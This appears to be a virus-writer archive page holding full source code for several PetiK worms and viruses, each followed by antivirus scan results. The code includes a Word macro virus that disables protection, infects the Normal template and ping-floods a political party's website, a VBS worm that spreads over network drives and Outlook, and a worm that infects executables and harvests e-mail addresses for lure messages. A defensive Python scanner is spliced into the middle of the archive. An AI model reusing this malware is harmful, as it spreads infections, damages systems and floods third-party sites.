TrendMicro  8.950.0.1092  2009.05.15
VBA32  3.12.10.5  2009.05.16
ViRobot  2009.5.15.1737  2009.05.15
VirusBuster  4.6.5.0  2009.05.15

Additional information
File size: 1571 bytes
MD5...: b358dde6d08d84cf4571df91509df185
SHA1..: bdec927521e2209aee0783b72b970b2211fb2d51

Result: VBS/Navigator.2 | VBS/Navigator.A | VBS:Malware-gen | VBS/Bother | VBS.Navigator.A | VBS.Generic.83 | VBS/Rophage.B | VBS/Navigator.A | Virus.VBS.Navigator | HTML/Vierka.A | VBS.Navigator.A | Virus.VBS.Navigator | W32/PetTick | W32/PetTick | Script.Navigator.2 | Virus:VBS/Navigator.gen | VBS/Petik | VBS/Navigator.F | VBS.Haram.A@mm | W32/Petik.U.worm | VBS.Ngator.A | W32/Petik-Y | VBS.Pet_Tick.gen | VBS_PETTICK.Y | VBS.Ngator.A

File Haram.vbs received on 05.16.2009 11:58:35 (CET)

Antivirus  Version  Last Update
a-squared  4.0.0.101  2009.05.16
AhnLab-V3  5.0.0.2  2009.05.15
AntiVir  7.9.0.168  2009.05.15
Antiy-AVL  2.0.3.1  2009.05.15
Authentium  5.1.2.4  2009.05.15
Avast  4.8.1335.0  2009.05.15
AVG  8.5.0.336  2009.05.15
BitDefender  7.2  2009.05.16
CAT-QuickHeal  10.00  2009.05.15
ClamAV  0.94.1  2009.05.15
Comodo  1157  2009.05.08
DrWeb  5.0.0.12182  2009.05.16
eSafe  7.0.17.0  2009.05.14
eTrust-Vet  31.6.6508  2009.05.16
F-Prot  4.4.4.56  2009.05.15
F-Secure  8.0.14470.0  2009.05.15
Fortinet  3.117.0.0  2009.05.16
GData  19  2009.05.16
Ikarus  T3.1.1.49.0  2009.05.16
K7AntiVirus  7.10.735  2009.05.14
Kaspersky  7.0.0.125  2009.05.16
McAfee  5616  2009.05.15
McAfee+Artemis  5616  2009.05.15
McAfee-GW-Edition  6.7.6  2009.05.15
Microsoft  1.4602  2009.05.16
NOD32  4080  2009.05.15
Norman  6.01.05  2009.05.16
nProtect  2009.1.8.0  2009.05.16
Panda  10.0.0.14  2009.05.16
PCTools  4.4.2.0  2009.05.15
Prevx  3.0  2009.05.16
Rising  21.29.52.00  2009.05.16
Sophos  4.41.0  2009.05.16
Sunbelt  3.2.1858.2  2009.05.16
Symantec  1.4.4.12  2009.05.16
TheHacker  6.3.4.1.326  2009.05.15
TrendMicro  8.950.0.1092  2009.05.15
VBA32  3.12.10.5  2009.05.16
ViRobot  2009.5.15.1737  2009.05.15
VirusBuster  4.6.5.0  2009.05.15

Additional information
File size: 721 bytes
MD5...: 0316dbe5df244e6a4fc18ce96e7b3907
SHA1..: 1fea896705358384a6889d1a223f1416b2880902

Result: VBS.Lee.Based!IK | VBS/Petik | VBS/Navigator.1 | Heuristic-31 | VBS:Malware-gen | VBS/Randa | Generic.ScriptWorm.D5290353 | VBS.Generic.84 | VBS/Mailworm1 | Heuristic-31 | Email-Worm.Win32.Petik | VBS/Pica.X@mm | Generic.ScriptWorm.D5290353 | VBS.Lee.Based | VBS.Generic.MassMailer | Email-Worm.Win32.Petik | W32/PetTick.vbs | W32/PetTick.vbs | Script.Navigator.1 | Virus:VBS/Petik.Y | probably unknown SCRIPT | VBS.Haram.A@mm | VBS.Pethar.A | VBS.I-Worm.Lee-Based | W32/Petik-Y | VBS.Pet_Tick.gen | VBS_GENERIC.009 | Email-Worm.Win32.Petik | VBS.Worm-Family | VBS.Pethar.A


Name     : W97M.Blood
Author   : PetiK
Language : VBA Word
Date     : June 18th 2001
Size     : 2701 bytes

Macro AutoOpen: disables all the protection against viruses, creates \WINDOWS\blood.sys and puts the macro code in it. If the Blood key does not exist under the Windows key in the registry, W97M.Blood infects NORMAL.DOT. If the current day is the 15th, it changes the names of the owner and the organization to "BloodMan" and "PetiK Corporation".
Macro HelpAbout: displays a balloon message.
Macro ViewVBCode: adds a value to the Run key to disable the mouse and displays a message box.
Macro AutoClose: shows a message box, then calls two other macros.
Macro PetiK: creates the folder \WINDOWS\Blood and puts the file TitleBlood.txt in it.
Macro Attak: pings the fucking web site of "Front National". It's a DoS attack.
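As an added example (not PetiK's code and not part of the archive), the following Python scan takes extracted VBA source text and flags the behaviours the description above lists, then classifies a module that shows both protection tampering and self-replication. The indicator regexes, the constructed infected sample (modelled on the AutoOpen macro as described, with a placeholder payload value) and the constructed benign sample are assumptions of the example.

```python
"""Static indicator scan for W97M.Blood-style macro behaviour.

Added example, not code from the PetiK archive. Input is extracted VBA
source text (for instance the output of a macro extractor); the scan flags
the behaviours the description lists and classifies the module. The
indicator patterns and both samples below are constructed for this example.
"""
import re
from typing import Dict, List

# (indicator name, regex, category)
# tamper    : weakens Word's own macro defences
# replicate : copies module code between NORMAL.DOT and the open document
# persist   : leaves a foothold outside the document (Run key, marker key)
INDICATORS = [
    ("virus_protection_off", r"\.VirusProtection\s*=\s*False", "tamper"),
    ("security_level_lowered", r'Word\\Security",\s*"Level"\)\s*=\s*1', "tamper"),
    ("auto_macros_forced_on", r"WordBasic\.DisableAutoMacros\s+0", "tamper"),
    ("normal_template_vbproject", r"NormalTemplate\.VBProject\.VBComponents", "replicate"),
    ("module_export_import", r"\.(Export|Import)\s+\S", "replicate"),
    ("run_key_write", r"CurrentVersion\\Run\\", "persist"),
    ("infection_marker_key", r'Windows\\Blood\\",\s*"InfectDot"', "persist"),
]
_COMPILED = [(name, re.compile(rx, re.IGNORECASE), cat) for name, rx, cat in INDICATORS]


def scan_vba(source: str) -> Dict[str, List[int]]:
    """Map each indicator that fires to the 1-based line numbers where it fires."""
    hits: Dict[str, List[int]] = {}
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, rx, _cat in _COMPILED:
            if rx.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def classify(hits: Dict[str, List[int]]) -> str:
    """Tampering plus replication is the macro-virus pattern; anything else is only suspicious."""
    categories = {cat for name, _rx, cat in _COMPILED if name in hits}
    if "tamper" in categories and "replicate" in categories:
        return "macro-replicator"
    if categories:
        return "suspicious"
    return "clean"


# Constructed sample modelled on the AutoOpen behaviour described on the page
# (the Run-key payload on line 12 is a placeholder, not the original value).
SAMPLE_INFECTED = r'''Sub AutoOpen()
On Error Resume Next
With Options
.VirusProtection = False
End With
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
WordBasic.DisableAutoMacros 0
Set Nor = NormalTemplate.VBProject.VBComponents
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Blood\", "InfectDot") <> "OK" Then
Nor.Import DropFile
End If
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\", "Blood1") = "PLACEHOLDER.exe"
End Sub
'''

# Constructed benign macro: it only touches the document, so nothing should fire.
SAMPLE_BENIGN = r'''Sub FormatReport()
Selection.WholeStory
Selection.Font.Name = "Arial"
ActiveDocument.Save
End Sub
'''


def report(source: str) -> str:
    """Human-readable summary: one fired indicator per line, then the verdict."""
    hits = scan_vba(source)
    lines = [f"{name}: lines {nums}" for name, nums in sorted(hits.items())]
    lines.append(f"verdict: {classify(hits)}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_INFECTED))
    print("---")
    print(report(SAMPLE_BENIGN))
```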

Attribute VB_Name = "Blood"

Sub AutoOpen()
On Error Resume Next
With Options
    .ConfirmConversions = False
    .VirusProtection = False
    .SaveNormalPrompt = False
End With
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
WordBasic.DisableAutoMacros 0
Set Nor = NormalTemplate.VBProject.VBComponents
Set Doc = ActiveDocument.VBProject.VBComponents
win = Environ("windir")
DropFile = win & "\blood.sys"
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Blood\", "InfectDot") <> "OK" Then
    Doc("Blood").Export DropFile
    Nor.Import DropFile
    System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Blood\", "InfectDot") = "OK"
End If
If Doc.Item("Blood").Name <> "Blood" Then
    Nor("Blood").Export DropFile
    Doc.Import DropFile
    ActiveDocument.Save
End If
If Day(Now) = 15 Then
    System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOwner") = "BloodMan"
    System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOrganization") = "PetiK Corporation"
End If
End Sub

Sub HelpAbout()
With Application.Assistant
    .Visible = True
End With
With Assistant.NewBalloon
    .Text = "W97M.Blood.A coded by PetiK (c)2001"
    .Heading = "W97M.Blood"
    .Animation = msoAnimationGetAttentionMajor
    .Button = msoButtonSetOK
    .Show
End With
End Sub

Sub ViewVBCode()
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\", "Blood1") = "rundll32 mouse,disable"
MsgBox "Your computer is dead." + vbCr + "Don't stop your machine", vbCritical, "W97M.Blood"
ShowVisualBasicEditor = True
End Sub

Sub AutoClose()
MsgBox "PetiK vous souhaite une très bonne journée", vbExclamation, "W97M.Blood"
Call PetiK
Call Attak
End Sub

Sub PetiK()
On Error Resume Next
win = Environ("windir")
FileSystem.MkDir win & "\Blood"
Open win & "\Blood\TitleBlood.txt" For Output As #1
Print #1, "For the new Macro Virus W97M.Blood by PetiK"
Print #1, ""
Print #1, "Hi " & Application.UserName & ","
Print #1, "How do you do ?"
Print #1, "Your computer is infected by Blood"
Print #1, "It's not a dangerous macro."
Print #1, " Bye. PetiK"
Close #1
FileSystem.SetAttr win & "\Blood\TitleBlood.txt", vbReadOnly
End Sub

Sub Attak()
Shell "ping -l 5000 -t www.front-national.fr", vbHide
Shell "ping -l 5000 -t front-national.fr", vbHide
End Sub

File Blood.doc received on 05.16.2009 10:45:39 (CET)

Antivirus  Version  Last Update
a-squared  4.0.0.101  2009.05.16
AhnLab-V3  5.0.0.2  2009.05.15
AntiVir  7.9.0.168  2009.05.15
Antiy-AVL  2.0.3.1  2009.05.15
Authentium  5.1.2.4  2009.05.15
Avast  4.8.1335.0  2009.05.15
AVG  8.5.0.336  2009.05.15
BitDefender  7.2  2009.05.16
CAT-QuickHeal  10.00  2009.05.15
ClamAV  0.94.1  2009.05.15
Comodo  1157  2009.05.08
DrWeb  5.0.0.12182  2009.05.16
eSafe  7.0.17.0  2009.05.14
eTrust-Vet  31.6.6508  2009.05.16
F-Prot  4.4.4.56  2009.05.15
F-Secure  8.0.14470.0  2009.05.15
Fortinet  3.117.0.0  2009.05.16
GData  19  2009.05.16
Ikarus  T3.1.1.49.0  2009.05.16
K7AntiVirus  7.10.735  2009.05.14
Kaspersky  7.0.0.125  2009.05.16
McAfee  5616  2009.05.15
McAfee+Artemis  5616  2009.05.15
McAfee-GW-Edition  6.7.6  2009.05.15
Microsoft  1.4602  2009.05.16
NOD32  4080  2009.05.15
Norman  6.01.05  2009.05.16
nProtect  2009.1.8.0  2009.05.16
Panda  10.0.0.14  2009.05.15
PCTools  4.4.2.0  2009.05.15
Prevx  3.0  2009.05.16
Rising  21.29.51.00  2009.05.16
Sophos  4.41.0  2009.05.16
Sunbelt  3.2.1858.2  2009.05.16
Symantec  1.4.4.12  2009.05.16
TheHacker  6.3.4.1.326  2009.05.15
TrendMicro  8.950.0.1092  2009.05.15
VBA32  3.12.10.5  2009.05.16
ViRobot  2009.5.15.1737  2009.05.15
VirusBuster  4.6.5.0  2009.05.15

Additional information
File size: 36864 bytes
MD5...: 8cd23603a72f1dcbdf22e03d49c17f83
SHA1..: f970fea6b876ba8d133900ceb55a14bf0c307335

Result: Virus.MSWord.Petman.A!IK | W2000M/Petman.A | Virus/MSWord.MSWord | W97M/Petman.A | MW97:Petman-A | W97M/Petman | W97M.Petman.A | WM.Pivis | Virus.MSWord.Petik | W97M.Petik | O97M.GNtp | W97M/Petman.A | W97M/Petman.A | Virus.MSWord.Petik | W97M/Petman.A | W97M.Petman.A | Virus.MSWord.Petman.A | Macro.Petik | Virus.MSWord.Petik | W97M/Generic | W97M/Generic | Macro.Petman.A | Virus:W97M/Petman.A | W97M/Petman.A | W97M/Petman.A | W97M.Petman.A | W97M/Kodak.worm | WORD.97.Petik.M | Macro.Word97.Petik | WM97/Dool-A | Virus.MSWord.Petik (v) | W97M.Pet_Tick.Intd | W2KM/Generico | W97M_PETMAN.A | Virus.W97M.Blood | W97M.Petman.A | WORD.97.Petik.M


Name     : VBS.Cachemire
Author   : PetiK
Language : VBS
Date     : 19/06/2002

On error resume next
fs="FileSystemObject"
sc="Scripting"
wsc="WScript"
sh="Shell"
nt="Network"
crlf=Chr(13)&Chr(10)
Set fso=CreateObject(sc & "." & fs)
Set ws=CreateObject(wsc & "." & sh)
Set ntw=CreateObject(wsc & "." & nt)
Set win=fso.GetSpecialFolder(0)
Set sys=fso.GetSpecialFolder(1)
Set tmp=fso.GetSpecialFolder(2)
desk=ws.SpecialFolders("Desktop")
strp=ws.SpecialFolders("StartUp")
Set fl=fso.OpenTextFile(WScript.ScriptFullName,1)
wrm=fl.ReadAll
fl.Close
If WScript.ScriptFullName <> sys&"\MsBackup.vbs" Then
    MsgBox "Sorry but the file """ & WScript.ScriptName & """ is not a valid VBS file",vbcritical,"ALERT"
    fso.GetFile(WScript.ScriptFullName).Copy(sys&"\MsBackup.vbs")
    'ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MsBackup",sys&"\MsBackup.vbs"
    netn=""
    For cnt = 1 To 8
        netn=netn & Chr(Int(Rnd(1) * 26) + 97)
    Next
    netn = netn & ".vbs"
    msgbox netn
    spreadnetwrk(netn)
    set lnk = ws.CreateShortcut(desk & "\Surprise.lnk")
    lnk.TargetPath = sys&"\MsBackup.vbs"
    lnk.WindowStyle = 1
    lnk.Hotkey = "CTRL+SHIFT+F"
    lnk.IconLocation = "wscript.exe, 0"
    lnk.Description = "Surprise"
    lnk.WorkingDirectory = sys
    lnk.Save
Else
    y=0
    Do Until y=Day(Now)
        y=y+1
    Loop
    If Day(Now) = Int((31 * Rnd) + 1) Then
        ws.Run "notepad.exe"
        wscript.Sleep 200
        ws.SendKeys "Date : " & date & vbLf
        ws.SendKeys "Time : " & time & crlf
        x = 0
        Do Until x=6
            num = Int((6 * Rnd) + 1)
            If num = 1 Then
                mess = "You're infected by my new VBS virus. " & VbLf & "Don't panic, it's not Dangerous" & vbCrlf
            ElseIf num = 2 Then
                mess = "Why do you click unknown file ??" & crlf
            ElseIf num = 3 Then
                mess = "A new creation coded by PetiK/[b8]" & crlf
            ElseIf num = 4 Then
                mess = "Contact an AV support to disinfect your system" & crlf
            ElseIf num = 5 Then
                mess = "Be careful next time" & crlf
            ElseIf num = 6 Then
                mess = "Curiosity is bad" & crlf
            End If
            For i = 1 to Len(mess)
                ws.SendKeys Mid(mess,i,1)
                wscript.Sleep 50
            Next
            x=x+1
        Loop
    End If
End If

Sub spreadnetwrk(nname)
    Set drve = ntw.EnumNetworkDrives
    If drve.Count > 0 Then
        For j = 0 To drve.Count -1
            If drve.Item(j) <> "" Then
                fso.GetFile(WScript.ScriptFullName).Copy(drve.Item(j) & "\" & nname)
            End If
        Next
    End If
End Sub

Sub spreadout()
    Set A=CreateObject("Outlook.Application")
    Set B=A.GetNameSpace("MAPI")
    For Each C In B.AddressLists
        If C.AddressEntries.Count <> 0 Then
            For D=1 To C.AddressEntries.count
                Set E=C.AddressEntries(D)
                Set F=A.CreateItem(0)
                F.To=E.Address
                F.Subject="Backup your system..."
                F.Body="Use this tool to create a backup of your system..."
                Set G=CreateObject("Scripting.FileSystemObject")
                F.Attachments.Add(sys&"\MsBackup.vbs")
                F.DeleteAfterSubmit=True
                If F.To <> "" Then
                    F.Send
                End If
            Next
        End If
    Next
End Sub

File Cachemire.vbs received on 05.16.2009 11:21:06 (CET)

Antivirus  Version  Last Update
a-squared  4.0.0.101  2009.05.16
AhnLab-V3  5.0.0.2  2009.05.15
AntiVir  7.9.0.168  2009.05.15
Antiy-AVL  2.0.3.1  2009.05.15
Authentium  5.1.2.4  2009.05.15
Avast  4.8.1335.0  2009.05.15
AVG  8.5.0.336  2009.05.15
BitDefender  7.2  2009.05.16
CAT-QuickHeal  10.00  2009.05.15
ClamAV  0.94.1  2009.05.15
Comodo  1157  2009.05.08
DrWeb  5.0.0.12182  2009.05.16
eSafe  7.0.17.0  2009.05.14
eTrust-Vet  31.6.6508  2009.05.16
F-Prot  4.4.4.56  2009.05.15
F-Secure  8.0.14470.0  2009.05.15
Fortinet  3.117.0.0  2009.05.16
GData  19  2009.05.16
Ikarus  T3.1.1.49.0  2009.05.16
K7AntiVirus  7.10.735  2009.05.14
Kaspersky  7.0.0.125  2009.05.16
McAfee  5616  2009.05.15
McAfee+Artemis  5616  2009.05.15
McAfee-GW-Edition  6.7.6  2009.05.15
Microsoft  1.4602  2009.05.16
NOD32  4080  2009.05.15
Norman  6.01.05  2009.05.16
nProtect  2009.1.8.0  2009.05.16
Panda  10.0.0.14  2009.05.15
PCTools  4.4.2.0  2009.05.15
Prevx  3.0  2009.05.16
Rising  21.29.52.00  2009.05.16
Sophos  4.41.0  2009.05.16
Sunbelt  3.2.1858.2  2009.05.16
Symantec  1.4.4.12  2009.05.16
TheHacker  6.3.4.1.326  2009.05.15
TrendMicro  8.950.0.1092  2009.05.15
VBA32  3.12.10.5  2009.05.16
ViRobot  2009.5.15.1737  2009.05.15

Result: Email-Worm.Win32.Petik!IK | VBS/Petik.C | Worm/Petik.L | Worm/Win32.Petik | VBS/Petik.I@mm | VBS:MailWorm-gen | I-Worm/Petik | Generic.ScriptWorm.91D6A07B | Worm.Petik.l | Worm.Win32.Petik.l | VBS.Generic.43 | VBS.MailSender. | VBS/SSIWG2 | VBS/Petik.I@mm | Email-Worm.Win32.Petik.l | VBS/Petik.L@mm | Generic.ScriptWorm.91D6A07B | Email-Worm.Win32.Petik | Email-Worm.Win32.Petik.l | VBS/Pica.worm.gen | VBS/Pica.worm.gen | Worm.Petik.L | Virus:VBS/Emire | probably unknown SCRIPT | VBS/GenMail.D | VBS.Petchem.A | Worm Generic | VBS.Petchem.A | Worm.Hopalong | VBS/Pica-G | VBS.Camire.Int | VBS/Mass.worm.gen | VBS_PICA.GEN | Email-Worm.Win32.Petik.l | VBS.Worm-Family

Additional information
File size: 2832 bytes
MD5...: 175dbf33282ed471b62d616be435a03f
SHA1..: 8d0a9298ab3af4827f47a90e3fbbe7073e5a9376

' Name     : W32.HLLW.Mars
' Author   : PetiK
' Language : Visual Basic
' Date     : 20/06/2002

Attribute VB_Name = "Module1"

Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Declare Function InternetGetConnectedState Lib "wininet.dll" (ByRef lpdwFlags As Long, ByVal dwReserved As Long) As Long
Private Declare Function InternetOpen Lib "wininet" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
Private Declare Function InternetCloseHandle Lib "wininet" (ByVal hInet As Long) As Integer
Private Declare Function InternetReadFile Lib "wininet" (ByVal hFile As Long, ByVal sBuffer As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Private Declare Function InternetOpenUrl Lib "wininet" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
Private Declare Function SetCurrentDirectory Lib "kernel32" Alias "SetCurrentDirectoryA" (ByVal lpPathName As String) As Long
Private Declare Function SHGetSpecialFolderLocation Lib "shell32.dll" (ByVal hwndOwner As Long, ByVal nFolder As Long, pidl As ITEMIDLIST) As Long
Private Declare Function SHGetPathFromIDList Lib "shell32.dll" Alias "SHGetPathFromIDListA" (ByVal pidl As Long, ByVal pszPath As String) As Long

Public sysDir As String
Public winDir As String
Public orig As String
Public cop As String

Const CSIDL_STARTUP = &H7

Private Type SHITEMID
    cb As Long
    abID As Byte
End Type

Private Type ITEMIDLIST
    mkid As SHITEMID
End Type

Sub Main()
On Error Resume Next
Dim sp, ext(1 To 9) As String, exts
ext(1) = "index.htm"
ext(2) = "index.html"
ext(3) = "index.asp"
ext(4) = "default.htm"
ext(5) = "default.html"
ext(6) = "default.asp"
ext(7) = "main.htm"
ext(8) = "main.html"
ext(9) = "main.asp"
Set ws = CreateObject("WScript.Shell")
sysDir = Space(500)
sysDir = Left(sysDir, GetSystemDirectory(sysDir, Len(sysDir)))
winDir = Space(500)
winDir = Left(sysDir, GetWindowsDirectory(winDir, Len(winDir)))
orig = App.Path & "\" & App.EXEName & ".exe"
Call Install
Call VbsDrop
Call InfectExe(sysDir)
Call InfectExe(winDir)
checkconnect:
If InternetGetConnectedState(0&, 0&) = 0 Then GoTo checkconnect
sp = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page")
If Len(sp) <> 0 Then
    If Right(sp, 1) = "/" Then
        For i = 1 To 9
            Call srchmail(sp & ext(i))
        Next i
    ElseIf Right(sp, 4) <> ".htm" And Right(sp, 5) <> ".html" Then
        For i = 1 To 9
            Call srchmail(sp & "/" & ext(i))
        Next i
    Else
    End If
End If
End Sub

Sub Install()
On Error Resume Next
Set ws = CreateObject("WScript.Shell")
FileCopy orig, sysDir & "\DebugW32.exe"
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Debug", sysDir & "\DebugW32.exe"
End Sub

Private Function GetSpecialfolder(CSIDL As Long) As String
Dim r As Long
Dim IDL As ITEMIDLIST
r = SHGetSpecialFolderLocation(100, CSIDL, IDL)
If r = NOERROR Then
    Path$ = Space$(512)
    r = SHGetPathFromIDList(ByVal IDL.mkid.cb, ByVal Path$)
    GetSpecialfolder = Left$(Path, InStr(Path, Chr$(0)) - 1)
    Exit Function
End If
GetSpecialfolder = ""
End Function

Sub VbsDrop()
On Error Resume Next
Dim lngbufferlen
Dim bbyte As Byte
Dim pefile As String
orig = App.Path & "\" & App.EXEName & ".exe"
vbfle = GetSpecialfolder(CSIDL_STARTUP) & "\start.vbs"
Open orig For Binary As #1
DoEvents
Do While Not EOF(1)
    DoEvents
    Get #1, , bbyte
    e = Hex(bbyte)
    If Len(e) = 1 Then e = "0" & Hex(bbyte)
    pefile = pefile & e
Loop
Close #1
vbsf = "'Mars" & vbCrLf & _
    "On Error Resume Next" & vbCrLf & _
    "Set fso=CreateObject(""Scripting.FilesystemObject"")" & vbCrLf & _
    "Set ws=CreateObject(""WScript.Shell"")" & vbCrLf & vbCrLf & _
    "pevb=""" & pefile & """" & vbCrLf & _
    "read = dec(pevb)" & vbCrLf & _
    "Set r = fso.CreateTextFile(fso.GetSpecialFolder(1) & ""\DebugW32.exe"", 2)" & vbCrLf & _
    "r.Write read" & vbCrLf & _
    "r.Close" & vbCrLf & _
    "ws.RegWrite ""HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Debug"", fso.GetSpecialFolder(1) & ""\DebugW32.exe""" & vbCrLf
vbsf2 = "For each fil in fso.GetFolder(ws.SpecialFolders(""MyDocuments"")).Files" & vbCrLf & _
    "ext = LCase(fso.GetExtensionName(fil.Path))" & vbCrLf & _
    "If ext <> ""vbs"" Then" & vbCrLf & _
    "fso.GetFile(WScript.ScriptFullName).Copy(fil.Path & "".vbs"")" & vbCrLf & _
    "End If" & vbCrLf & _
    "For Each sf In fso.GetFolder(ws.SpecialFolders(""MyDocuments"")).SubFolders" & vbCrLf & _
    "sprd(sf.Path)" & vbCrLf & _
    "Next" & vbCrLf & _
    "Next" & vbCrLf
vbsf3 = "Sub sprd(dir)" & vbCrLf & _
    "On Error Resume Next" & vbCrLf & _
    "For Each fil In fso.GetFolder(dir).Files" & vbCrLf & _
    "ext = LCase(fso.GetExtensionName(fil.Path))" & vbCrLf & _
    "If ext <> ""vbs"" Then" & vbCrLf & _
    "fso.GetFile(WScript.ScriptFullName).Copy(fil.Path & "".vbs"")" & vbCrLf & _
    "End If" & vbCrLf & _
    "Next" & vbCrLf & _
    "For Each sf In fso.GetFolder(dir).SubFolders" & vbCrLf & _
    "sprd(sf.Path)" & vbCrLf & _
    "Next" & vbCrLf & _
    "End Sub" & vbCrLf & vbCrLf & _
    "Function dec(octe)" & vbCrLf & _
    "For hexad = 1 To Len(octe) Step 2" & vbCrLf & _
    "dec = dec & Chr(""&h"" & Mid(octe, hexad, 2))" & vbCrLf & _
    "Next" & vbCrLf & _
    "End Function" & vbCrLf
vbsf4 = "Sub SprdOut()" & vbCrLf & _
    "Set outl=CreateObject(""Outlook.Application"")" & vbCrLf & _
    "For Each C In outl.GetNameSpace(""MAPI"").AddressLists" & vbCrLf & _
    "If C.AddressEntries.Count <> 0 Then" & vbCrLf & _
    "For dcnt=1 To C.AddressEntries.Count" & vbCrLf & _
    "Set courrier=outl.CreateItem(0)" & vbCrLf & _
    "courrier.To=C.AddressEntries(dcnt).Address" & vbCrLf & _
    "courrier.Subject=""Important EMail for "" & C.AddressEntries(dcnt).Name" & vbCrLf & _
    "courrier.Body=""Look at this attached file, it may be important.""" & vbCrLf & _
    "courrier.Attachments.Add(wScript.ScriptFullName)" & vbCrLf & _
    "courrier.DeleteafterSubmit=True" & vbCrLf & _
    "If courrier.To <> """" Then" & vbCrLf & _
    "courrier.Send" & vbCrLf & _
    "End If" & vbCrLf & _
    "Next" & vbCrLf & _
    "End If" & vbCrLf & _
    "Next" & vbCrLf
Open vbfle For Output As #1
Print #1, vbsf
Print #1, vbsf2
Print #1, vbsf3
Print #1, vbsf4
Close #1
End Sub

Sub InfectExe(dir As String)
On Error Resume Next
orig = App.Path & "\" & App.EXEName & ".exe"
Set fso = CreateObject("Scripting.FileSystemObject")
If fso.FolderExists(dir) Then
    x = 0
    For Each P In fso.GetFolder(dir).Files
        ext = LCase(fso.GetExtensionName(P.Name))
        nam = LCase(P.Name)
        If ext = "exe" Then
            If LCase(P.Name) <> "debugw32.exe" And (Right(LCase(P.Name), 9) <> "_vbpe.exe") Then
                If Not fso.FileExists(P.Name & "_vbpe.exe") Then
                    FileCopy orig, dir & "\" & P.Name & "_vbpe.exe"
                    x = x + 1
                End If
            End If
        End If
        If x = 5 Then Exit For
    Next
End If
End Sub

Sub srchmail(site As String)
On Error Resume Next
Set fso = CreateObject("Scripting.FilesystemObject")
Const INTERNET_OPEN_TYPE_DIRECT = 1
Const INTERNET_OPEN_TYPE_PROXY = 3
Const INTERNET_FLAG_RELOAD = &H80000000
Dim hOpen As Long, hFile As Long, sBuffer As String, Ret As Long
Dim mlto As String
sBuffer = Space(25000)
hOpen = InternetOpen(scUserAgent, INTERNET_OPEN_TYPE_DIRECT, vbNullString, vbNullString, 0)
hFile = InternetOpenUrl(hOpen, site, vbNullString, ByVal 0&, INTERNET_FLAG_RELOAD, ByVal 0&)
InternetReadFile hFile, sBuffer, 25000, Ret
InternetCloseHandle hFile
InternetCloseHandle hOpen
For j = 1 To Len(sbufr)
    If Mid(sBuffer, j, 7) = "mailto:" Then
        mlto = ""
        cnt = 0
        Do While Mid(sBuffer, j + 7 + cnt, 1) <> """"
            mlto = mlto + Mid(sBuffer, j + 7 + cnt, 1)
            cnt = cnt + 1
        Loop
        Call SendMail(mlto)
    End If
Next
End Sub

Sub SendMail(email As String)
Dim out
orig = App.Path & "\" & App.EXEName & ".exe"
Set out = CreateObject("Outlook.Application")
Set map = out.GetNameSpace("MAPI")
map.Logon "profile", "password"
Set mel = out.CreateItem(0)
mel.To = email
mel.Subject = "Congratulations for your site"
mel.Body = "Congratulations for your site" & vbCrLf & _
    "This is a good tool to improve it." & vbCrLf & vbCrLf & _
    "Best Regards."
mel.Attachments.Add orig, 1, 1, "WebMakeFullInstall.exe"
mel.Send
map.Logoff
Set out = Nothing
End Sub

File WormMars.exe received on 05.16.2009 19:58:38 (CET)

Antivirus  Version  Last Update
a-squared  4.0.0.101  2009.05.16
AhnLab-V3  5.0.0.2  2009.05.16
AntiVir  7.9.0.168  2009.05.15
Antiy-AVL  2.0.3.1  2009.05.15
Authentium  5.1.2.4  2009.05.16
Avast  4.8.1335.0  2009.05.15
AVG  8.5.0.336  2009.05.15
BitDefender  7.2  2009.05.16
CAT-QuickHeal  10.00  2009.05.15
ClamAV  0.94.1  2009.05.16
Comodo  1157  2009.05.08
DrWeb  5.0.0.12182  2009.05.16
eSafe  7.0.17.0  2009.05.14
eTrust-Vet  31.6.6508  2009.05.16
F-Prot  4.4.4.56  2009.05.16
F-Secure  8.0.14470.0  2009.05.15
Fortinet  3.117.0.0  2009.05.16
GData  19  2009.05.16
Ikarus  T3.1.1.49.0  2009.05.16
K7AntiVirus  7.10.737  2009.05.16
Kaspersky  7.0.0.125  2009.05.16
McAfee  5616  2009.05.15
McAfee+Artemis  5616  2009.05.15
McAfee-GW-Edition  6.7.6  2009.05.15
Microsoft  1.4602  2009.05.16
NOD32  4080  2009.05.15
Norman  6.01.05  2009.05.16
nProtect  2009.1.8.0  2009.05.16
Panda  10.0.0.14  2009.05.16
PCTools  4.4.2.0  2009.05.16
Prevx  3.0  2009.05.16
Rising  21.29.52.00  2009.05.16
Sophos  4.41.0  2009.05.16
Sunbelt  3.2.1858.2  2009.05.16
